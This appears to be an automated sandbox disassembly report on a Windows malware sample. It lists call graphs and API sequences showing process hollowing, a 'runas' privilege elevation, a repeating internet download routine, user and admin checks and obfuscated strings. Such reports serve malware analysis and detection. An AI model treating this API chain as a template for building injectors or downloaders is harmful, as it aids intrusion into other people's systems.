API calls 22130->22133 22134 118b9ab __wsopen_s 11 API calls 22131->22134 22136 1193b3a 22133->22136 22139 1193c5d 22134->22139 22135 11939c7 22137 118d301 _free 14 API calls 22135->22137 22136->22131 22138 1193576 25 API calls 22136->22138 22143 11939d3 22137->22143 22140 1193b4c 22138->22140 22161 1193cb1 22139->22161 22228 118d7ea 15 API calls 2 library calls 22139->22228 22140->22131 22141 1193b55 22140->22141 22142 118d301 _free 14 API calls 22141->22142 22144 1193b60 GetTimeZoneInformation 22142->22144 22143->22178 22219 118ca9c 25 API calls 2 library calls 22143->22219 22159 1193b7c 22144->22159 22168 1193c17 22144->22168 22145 1193d21 22148 1193d1e 22145->22148 22149 1193b03 42 API calls 22145->22149 22154 118d301 _free 14 API calls 22148->22154 22149->22148 22150 1193d18 22153 1193928 42 API calls 22150->22153 22151 11939fd 22151->22122 22220 1194494 25 API calls 2 library calls 22151->22220 22152 1193cd0 22157 118d301 _free 14 API calls 22152->22157 22153->22148 22156 1193d2c 22154->22156 22160 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22156->22160 22157->22161 22158 1193cc9 22158->22152 22162 1193cf6 22158->22162 22225 1190f2b 37 API calls 2 library calls 22159->22225 22164 1193d3a 22160->22164 22161->22145 22161->22150 22165 118d301 _free 14 API calls 22162->22165 22164->22109 22165->22161 22166 1193bcf 22226 1190623 WideCharToMultiByte 22166->22226 22168->22109 22169 1193a16 22169->22122 22221 118b7af 40 API calls 22169->22221 22171 1193be8 22227 1190623 WideCharToMultiByte 22171->22227 22173 1193a3b 22174 1193a91 22173->22174 22222 118b7af 40 API calls 22173->22222 22174->22178 22224 1194494 25 API calls 2 library calls 22174->22224 22176 1193a62 22176->22174 22223 118b7af 40 API calls 22176->22223 22178->22109 22181 1193b12 22180->22181 22182 11935a2 25 API calls 22181->22182 22183 1193b28 22182->22183 22184 1193c53 22183->22184 22185 119354a 25 API calls 22183->22185 22186 118b9ab __wsopen_s 11 API calls 22184->22186 22187 1193b3a 22185->22187 22189 1193c5d 22186->22189 22187->22184 22188 1193576 25 API calls 22187->22188 22190 1193b4c 22188->22190 22211 1193cb1 22189->22211 22232 118d7ea 15 API calls 2 library calls 22189->22232 22190->22184 22191 1193b55 22190->22191 22192 118d301 _free 14 API calls 22191->22192 22193 1193b60 GetTimeZoneInformation 22192->22193 22200 1193c17 22193->22200 22206 1193b7c 22193->22206 22194 1193d21 22196 1193d1e 22194->22196 22197 1193b03 42 API calls 22194->22197 22202 118d301 _free 14 API calls 22196->22202 22197->22196 22198 1193d18 22201 1193928 42 API calls 22198->22201 22199 1193cd0 22204 118d301 _free 14 API calls 22199->22204 22200->22109 22201->22196 22203 1193d2c 22202->22203 22207 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22203->22207 22204->22211 22205 1193cc9 22205->22199 22208 1193cf6 22205->22208 22229 1190f2b 37 API calls 2 library calls 22206->22229 22210 1193d3a 22207->22210 22212 118d301 _free 14 API calls 22208->22212 22210->22109 22211->22194 22211->22198 22212->22211 22213 1193bcf 22230 1190623 WideCharToMultiByte 22213->22230 22215 1193be8 22231 1190623 WideCharToMultiByte 22215->22231 22217->22112 22218->22135 22219->22151 22220->22169 22221->22173 22222->22176 22223->22174 22224->22122 22225->22166 22226->22171 22227->22168 22228->22158 22229->22213 22230->22215 22231->22200 22232->22205 22233->22082 22234->22089 22235->22096 22236 11797c1 22251 1175d30 GetModuleFileNameA 22236->22251 22239 1185760 27 API calls 22240 11797ec 22239->22240 22241 1172be0 42 API calls 22240->22241 22242 11797f3 22241->22242 22243 1185760 27 API calls 22242->22243 22244 1179808 22243->22244 22245 1172be0 42 API calls 22244->22245 22246 117980f 22245->22246 22247 1172ea0 28 API calls 22246->22247 22248 117981e 22247->22248 22249 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22248->22249 22250 1179b06 22249->22250 22252 1175dc0 22251->22252 22252->22252 22253 1185ac0 27 API calls 22252->22253 22254 1175ddc 22253->22254 22255 1185760 27 API calls 22254->22255 22270 1175df5 22255->22270 22256 1185760 27 API calls 22256->22270 22257 1175f5f 22258 1185ac0 27 API calls 22257->22258 22261 1175fd6 22258->22261 22259 1172be0 42 API calls 22259->22270 22260 1176053 22262 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22260->22262 22261->22260 22263 1176081 22261->22263 22264 117607a 22262->22264 22265 118b98e 25 API calls 22263->22265 22264->22239 22266 1176086 22265->22266 22271 1185c00 27 API calls 22266->22271 22267 1185ac0 27 API calls 22267->22270 22270->22256 22270->22257 22270->22259 22270->22263 22270->22266 22270->22267 22272 1174060 22273 1185760 27 API calls 22272->22273 22274 11740ab 22273->22274 22275 1172be0 42 API calls 22274->22275 22276 11740b3 22275->22276 22277 1185d10 27 API calls 22276->22277 22278 11740c3 22277->22278 22279 1185760 27 API calls 22278->22279 22280 11740de 22279->22280 22281 1172be0 42 API calls 22280->22281 22282 11740e5 22281->22282 22283 1185ac0 27 API calls 22282->22283 22284 1174108 22283->22284 22285 1173990 28 API calls 22284->22285 22286 1174111 22285->22286 22287 1174144 Sleep 22286->22287 22289 117413a 22286->22289 22291 1174199 22286->22291 22288 1174157 22287->22288 22295 1174175 22287->22295 22292 117419e 22288->22292 22288->22295 22289->22287 22290 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22293 1174195 22290->22293 22294 118b98e 25 API calls 22291->22294 22296 118b98e 25 API calls 22292->22296 22294->22292 22295->22290 22297 11741a3 22296->22297 22298 117cfe0 22299 1185760 27 API calls 22298->22299 22300 117d029 22299->22300 22301 1172be0 42 API calls 22300->22301 22302 117d031 22301->22302 22362 1185db0 22302->22362 22304 117d046 22305 1185c10 27 API calls 22304->22305 22306 117d055 GetFileAttributesA 22305->22306 22310 117d06e 22306->22310 22308 117d7e6 22311 118b98e 25 API calls 22308->22311 22309 117d138 22313 1185760 27 API calls 22309->22313 22337 117d257 22309->22337 22310->22308 22310->22309 22312 117d7eb 22311->22312 22315 118b98e 25 API calls 22312->22315 22316 117d15b 22313->22316 22314 1185760 27 API calls 22317 117d270 22314->22317 22318 117d7f0 22315->22318 22319 1172be0 42 API calls 22316->22319 22320 1172be0 42 API calls 22317->22320 22322 118b98e 25 API calls 22318->22322 22323 117d163 22319->22323 22321 117d278 22320->22321 22324 1185db0 27 API calls 22321->22324 22351 117d429 22322->22351 22325 1185db0 27 API calls 22323->22325 22326 117d28d 22324->22326 22328 117d178 22325->22328 22329 1185c10 27 API calls 22326->22329 22327 118b98e 25 API calls 22330 117d7fa 22327->22330 22331 1185c10 27 API calls 22328->22331 22332 117d29c GetFileAttributesA 22329->22332 22333 117d187 CreateDirectoryA 22331->22333 22338 117d2b5 22332->22338 22336 117d1a1 22333->22336 22336->22312 22336->22337 22337->22314 22338->22318 22339 117d37d 22338->22339 22340 117d38f 22339->22340 22341 117d6ee 22339->22341 22343 1185760 27 API calls 22340->22343 22342 1185ac0 27 API calls 22341->22342 22342->22351 22344 117d3a6 22343->22344 22345 1175030 27 API calls 22344->22345 22346 117d3ae 22345->22346 22347 1185760 27 API calls 22346->22347 22348 117d3c5 22347->22348 22350 1172be0 42 API calls 22348->22350 22349 117d6e9 22352 117d3d0 22350->22352 22351->22327 22351->22349 22353 1185db0 27 API calls 22352->22353 22354 117d3e8 22353->22354 22355 1185c10 27 API calls 22354->22355 22356 117d3f7 22355->22356 22357 1185c10 27 API calls 22356->22357 22358 117d408 22357->22358 22359 1185ef0 27 API calls 22358->22359 22360 117d419 22359->22360 22361 1185d10 27 API calls 22360->22361 22361->22351 22363 1186720 27 API calls 22362->22363 22364 1185e1e 22363->22364 22366 1185e39 __InternalCxxFrameHandler 22364->22366 22370 1186460 27 API calls 2 library calls 22364->22370 22369 1185e8d __InternalCxxFrameHandler 22366->22369 22371 1186460 27 API calls 2 library calls 22366->22371 22368 1185ed3 22368->22304 22369->22304 22370->22366 22371->22368 22372 1187422 22377 1187725 SetUnhandledExceptionFilter 22372->22377 22374 1187427 22378 118c988 25 API calls 2 library calls 22374->22378 22376 1187432 22377->22374 22378->22376 22379 118ac84 22380 118aca0 22379->22380 22381 118ac92 22379->22381 22383 118aa80 __wsopen_s 37 API calls 22380->22383 22382 118acf6 57 API calls 22381->22382 22384 118ac9c 22382->22384 22385 118acba 22383->22385 22386 118a9e0 __wsopen_s 17 API calls 22385->22386 22388 118acc7 22386->22388 22387 118acce 22390 118acf0 22387->22390 22391 118d301 _free 14 API calls 22387->22391 22388->22387 22392 118acf6 22388->22392 22391->22390 22393 118ad21 ___scrt_fastfail 22392->22393 22394 118ad04 22392->22394 22397 118ad63 CreateFileW 22393->22397 22398 118ad47 22393->22398 22441 118b48f 14 API calls _free 22394->22441 22396 118ad09 22399 118b4a2 _free 14 API calls 22396->22399 22401 118ad95 22397->22401 22402 118ad87 22397->22402 22443 118b48f 14 API calls _free 22398->22443 22403 118ad11 22399->22403 22445 118add4 49 API calls __dosmaperr 22401->22445 22415 118ae5e GetFileType 22402->22415 22442 118b97e 25 API calls __wsopen_s 22403->22442 22404 118ad4c 22408 118b4a2 _free 14 API calls 22404->22408 22410 118ad53 22408->22410 22409 118ad1c 22409->22387 22444 118b97e 25 API calls __wsopen_s 22410->22444 22412 118ad90 ___scrt_fastfail 22413 118ad5e 22412->22413 22414 118adc6 CloseHandle 22412->22414 22413->22387 22414->22413 22416 118ae99 22415->22416 22417 118af4b 22415->22417 22418 118aeb3 ___scrt_fastfail 22416->22418 22463 118b1d6 21 API calls __dosmaperr 22416->22463 22419 118af77 22417->22419 22421 118af55 22417->22421 22423 118aed2 GetFileInformationByHandle 22418->22423 22432 118af42 22418->22432 22422 118afa1 PeekNamedPipe 22419->22422 22419->22432 22424 118af68 GetLastError 22421->22424 22425 118af59 22421->22425 22422->22432 22423->22424 22427 118aee8 22423->22427 22465 118b46c 14 API calls 2 library calls 22424->22465 22428 118b4a2 _free 14 API calls 22425->22428 22426 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22430 118afcc 22426->22430 22446 118b128 22427->22446 22428->22432 22430->22412 22432->22426 22436 118afd0 7 API calls 22437 118af18 22436->22437 22438 118afd0 7 API calls 22437->22438 22439 118af2f 22438->22439 22464 118b0f5 14 API calls _free 22439->22464 22441->22396 22442->22409 22443->22404 22444->22413 22445->22412 22447 118b13e _wcsrchr 22446->22447 22455 118aef4 22447->22455 22466 118e906 38 API calls 2 library calls 22447->22466 22449 118b182 22449->22455 22467 118e906 38 API calls 2 library calls 22449->22467 22451 118b193 22451->22455 22468 118e906 38 API calls 2 library calls 22451->22468 22453 118b1a4 22453->22455 22469 118e906 38 API calls 2 library calls 22453->22469 22456 118afd0 22455->22456 22457 118afe8 22456->22457 22458 118aff6 FileTimeToSystemTime 22456->22458 22457->22458 22460 118afee 22457->22460 22459 118b008 SystemTimeToTzSpecificLocalTime 22458->22459 22458->22460 22459->22460 22461 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22460->22461 22462 118af05 22461->22462 22462->22436 22463->22418 22464->22432 22465->22432 22466->22449 22467->22451 22468->22453 22469->22455
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 01175630: GetTempPathA.KERNEL32(00000104,?,A875633B,?,00000000), ref: 01175677
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01176EA3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFilePathTemp
                                                                                                                                                                                      • String ID: QQTM$QSTugjw=$QX3yfZJm$RQHKZx==$Th3DhD1l$UX3BeD1q
                                                                                                                                                                                      • API String ID: 3199926297-1402524447
                                                                                                                                                                                      • Opcode ID: 127fff47345a8726745f804151b7be9d7ce03ea892bbc6a87ccdf84d1a93fb04
                                                                                                                                                                                      • Instruction ID: a31c0905d5e35bb3c0f1a42ac4e4903ca61634c74fd331872dc38fb6214fd1c5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 127fff47345a8726745f804151b7be9d7ce03ea892bbc6a87ccdf84d1a93fb04
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9132A470E10249DBEB1CEBA8C55C7DDBFB2AB16324F688648C511773C6D7B50A84CBA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01173776
                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 011737DB
                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 011737F4
                                                                                                                                                                                      • GetThreadContext.KERNELBASE(?,00000000), ref: 0117380F
                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?, ,?,00000004,00000000), ref: 01173833
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0117384E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01173855
                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0117387D
                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000), ref: 0117389E
                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,?,00000000), ref: 011738E2
                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,00000000), ref: 0117391E
                                                                                                                                                                                      • SetThreadContext.KERNELBASE(?,00000000,?,?,00000000), ref: 0117393A
                                                                                                                                                                                      • ResumeThread.KERNELBASE(?,?,?,00000000), ref: 01173946
                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000), ref: 01173954
                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01173975
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                                                                      • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                      • API String ID: 4033543172-1522589568
                                                                                                                                                                                      • Opcode ID: 548956e88bee08f5e4330a9f20df1503617fbf6d371892936cbf2190d5c5242b
                                                                                                                                                                                      • Instruction ID: 977e8d059646b9193ed62bd9f8b30c273a3be3dd613306b60cf45890ce87d249
                                                                                                                                                                                      • Opcode Fuzzy Hash: 548956e88bee08f5e4330a9f20df1503617fbf6d371892936cbf2190d5c5242b
                                                                                                                                                                                      • Instruction Fuzzy Hash: F9519E71A41218EFDB25DF54DC49FEABBB8FF08701F1400A5F629AA280D771A990CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,01173BAD,A875633B,?,00000000,00000000), ref: 01173A32
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                      • String ID: runas
                                                                                                                                                                                      • API String ID: 587946157-4000483414
                                                                                                                                                                                      • Opcode ID: 79fe6434954e0834e43e53eaa893e6d7475052a06343a82ecabe3df37c6138cc
                                                                                                                                                                                      • Instruction ID: bc80d723b9984b5e4ce5cc9a6fe652d3469a82242aed08f47384b17cb3be7fad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 79fe6434954e0834e43e53eaa893e6d7475052a06343a82ecabe3df37c6138cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9912471620148ABDB0CEF68CD85B9DBBBAFB46314F948519E821D73C4D735EA80CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00017731,01187427), ref: 0118772A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                      • Opcode ID: 7697c631a7686f9b5d0069b641d765af807ff33b0b4348cafa04bf1e0e9de238
                                                                                                                                                                                      • Instruction ID: df76b85405812c6c49b35400388eea7096ca03094ebd4f5622b1583ad69f98e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7697c631a7686f9b5d0069b641d765af807ff33b0b4348cafa04bf1e0e9de238
                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 1180395-11803b7 GetFileAttributesA 3 11803e8-118040a 0->3 4 11803b9-11803c8 0->4 7 118043b-1180460 3->7 8 118040c-118041b 3->8 5 11803ca-11803d8 4->5 6 11803de-11803e5 call 1187335 4->6 5->6 11 1180c73-1180cda call 118b98e 5->11 6->3 9 118048e-1180490 7->9 10 1180462-118046e 7->10 13 118041d-118042b 8->13 14 1180431-1180438 call 1187335 8->14 18 11805e9-1180710 call 1185760 call 1172be0 call 1185760 call 1175030 call 1185760 call 1172be0 call 1185ac0 call 1175830 call 1185c10 * 3 call 1185ef0 call 1185c10 9->18 19 1180496-11804ff call 1185ac0 call 1175830 call 1185c10 9->19 15 1180470-118047e 10->15 16 1180484-118048b call 1187335 10->16 32 1180ce0-1180d59 call 1185760 call 1187343 call 1188380 InternetOpenA InternetOpenUrlA InternetReadFile 11->32 13->11 13->14 14->7 15->11 15->16 16->9 126 1180741-1180766 18->126 127 1180712-1180721 18->127 45 1180501 19->45 46 1180503-1180515 CreateDirectoryA 19->46 62 1180d5f-1180d69 InternetCloseHandle * 2 call 1173750 32->62 63 1180e14-1180e25 InternetCloseHandle * 2 32->63 45->46 49 1180546-118056b 46->49 50 1180517-1180526 46->50 53 118059c-11805bb 49->53 54 118056d-118057c 49->54 51 1180528-1180536 50->51 52 118053c-1180543 call 1187335 50->52 51->52 52->49 53->18 61 11805bd-11805c9 53->61 58 118057e-118058c 54->58 59 1180592-1180599 call 1187335 54->59 58->59 59->53 69 11805cb-11805d9 61->69 70 11805df-11805e6 call 1187335 61->70 71 1180d6e-1180d7a 62->71 67 1180e53-1180e62 Sleep 63->67 67->32 72 1180e68-1180ec3 call 1185760 call 1172be0 call 1185760 * 3 67->72 69->70 70->18 76 1180da8-1180daa 71->76 77 1180d7c-1180d88 71->77 117 1180ec7-1180ed9 call 1185760 call 117c950 72->117 76->67 84 1180db0-1180e0f call 1185760 call 1172be0 call 1185760 * 3 76->84 81 1180d8a-1180d98 77->81 82 1180d9e-1180da5 call 1187335 77->82 81->82 86 1180ffb-1181000 call 118b98e 81->86 82->76 84->117 125 1180ede-1180ee7 117->125 130 1180ee9-1180ef5 125->130 131 1180f15-1180f2d 125->131 128 1180768-1180777 126->128 129 1180797-11807b9 126->129 132 1180723-1180731 127->132 133 1180737-118073e call 1187335 127->133 134 1180779-1180787 128->134 135 118078d-1180794 call 1187335 128->135 138 11807ea-1180812 129->138 139 11807bb-11807ca 129->139 136 1180f0b-1180f12 call 1187335 130->136 137 1180ef7-1180f05 130->137 140 1180f5b-1180f73 131->140 141 1180f2f-1180f3b 131->141 132->133 133->126 134->135 135->129 136->131 137->86 137->136 151 1180843-118086b 138->151 152 1180814-1180823 138->152 147 11807cc-11807da 139->147 148 11807e0-11807e7 call 1187335 139->148 143 1180f9d-1180fb5 140->143 144 1180f75-1180f81 140->144 149 1180f3d-1180f4b 141->149 150 1180f51-1180f58 call 1187335 141->150 159 1180fdf-1180ffa call 1186cc2 143->159 160 1180fb7-1180fc3 143->160 154 1180f93-1180f9a call 1187335 144->154 155 1180f83-1180f91 144->155 147->148 148->138 149->86 149->150 150->140 156 118089c-11808c1 151->156 157 118086d-118087c 151->157 164 1180839-1180840 call 1187335 152->164 165 1180825-1180833 152->165 154->143 155->86 155->154 172 11808ef-118090e 156->172 173 11808c3-11808cf 156->173 168 118087e-118088c 157->168 169 1180892-1180899 call 1187335 157->169 170 1180fd5-1180fdc call 1187335 160->170 171 1180fc5-1180fd3 160->171 164->151 165->164 168->169 169->156 170->159 171->86 171->170 184 118093f-1180967 172->184 185 1180910-118091f 172->185 181 11808d1-11808df 173->181 182 11808e5-11808ec call 1187335 173->182 181->182 182->172 188 1180998-11809c0 184->188 189 1180969-1180978 184->189 186 1180921-118092f 185->186 187 1180935-118093c call 1187335 185->187 186->187 187->184 196 11809f1-1180a2a call 118a81c 188->196 197 11809c2-11809d1 188->197 194 118097a-1180988 189->194 195 118098e-1180995 call 1187335 189->195 194->195 195->188 207 1180ada-1180b21 call 1185760 * 2 call 1178aa0 call 118a81c 196->207 208 1180a30-1180a7a call 118a8aa call 1185760 call 118b41e 196->208 202 11809d3-11809e1 197->202 203 11809e7-11809ee call 1187335 197->203 202->203 203->196 231 1180be1-1180be7 207->231 232 1180b27-1180b58 call 118a8aa call 1185760 call 118b41e 207->232 222 1180aab-1180ab1 208->222 223 1180a7c-1180a8b 208->223 222->207 225 1180ab3-1180ad5 call 1185760 call 1172be0 222->225 226 1180a8d-1180a9b 223->226 227 1180aa1-1180aa8 call 1187335 223->227 252 1180bca-1180bd9 call 1185760 call 1173e80 225->252 226->227 227->222 234 1180be9-1180bf5 231->234 235 1180c15-1180c2d 231->235 259 1180b5d-1180b6f 232->259 240 1180c0b-1180c12 call 1187335 234->240 241 1180bf7-1180c05 234->241 242 1180c2f-1180c3b 235->242 243 1180c57-1180c72 call 1186cc2 235->243 240->235 241->240 248 1180c4d-1180c54 call 1187335 242->248 249 1180c3d-1180c4b 242->249 248->243 249->248 263 1180bde 252->263 261 1180ba0-1180ba6 259->261 262 1180b71-1180b80 259->262 261->231 266 1180ba8-1180bc6 call 1185760 call 1172be0 261->266 264 1180b82-1180b90 262->264 265 1180b96-1180b9d call 1187335 262->265 263->231 264->265 265->261 266->252
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000,?), ref: 01180398
                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 01180506
                                                                                                                                                                                      • InternetOpenA.WININET(011A337B,00000000,00000000,00000000,00000000), ref: 01180D1F
                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 01180D3C
                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 01180D50
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 01180D5F
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 01180D64
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$CloseFileHandleOpen$AttributesCreateDirectoryRead
                                                                                                                                                                                      • String ID: 853321935212$PBQ$PcL$PuL$TRzufd==$Xv==$ZBrx$ZOu=$Zyy=$w?RQf$ Q$/T$5U$IU$S`$[U$hQ
                                                                                                                                                                                      • API String ID: 3054941964-2240741031
                                                                                                                                                                                      • Opcode ID: 17f2030d2f92954d205a532c8d2052614612636b64bc7323906bcab2a9b229ea
                                                                                                                                                                                      • Instruction ID: eb322b2bc51a33594dd6208842fd97b9c380352bdcda6be4fb7f8248c13862af
                                                                                                                                                                                      • Opcode Fuzzy Hash: 17f2030d2f92954d205a532c8d2052614612636b64bc7323906bcab2a9b229ea
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C622871A002089BEB1CEB78CD5979DBF72AB56314F64C19CE448A73C1D7359A88CF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 01174400: GetVersionExW.KERNEL32(0000011C,A875633B), ref: 0117447A
                                                                                                                                                                                        • Part of subcall function 01174400: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011744DB
                                                                                                                                                                                        • Part of subcall function 01174400: GetProcAddress.KERNEL32(00000000), ref: 011744E2
                                                                                                                                                                                        • Part of subcall function 01174BA0: GetVersionExW.KERNEL32(0000011C,?,A875633B,00000000), ref: 01174C19
                                                                                                                                                                                      • IsUserAnAdmin.SHELL32 ref: 01182A1D
                                                                                                                                                                                        • Part of subcall function 01172D10: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A875633B,A875633B), ref: 01172D8C
                                                                                                                                                                                        • Part of subcall function 01172D10: RegQueryValueExA.KERNELBASE(A875633B,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A875633B,A875633B), ref: 01172DBA
                                                                                                                                                                                        • Part of subcall function 01172D10: RegCloseKey.KERNELBASE(A875633B,?,?,00000000,00000001,A875633B,A875633B), ref: 01172DC6
                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 01182AC7
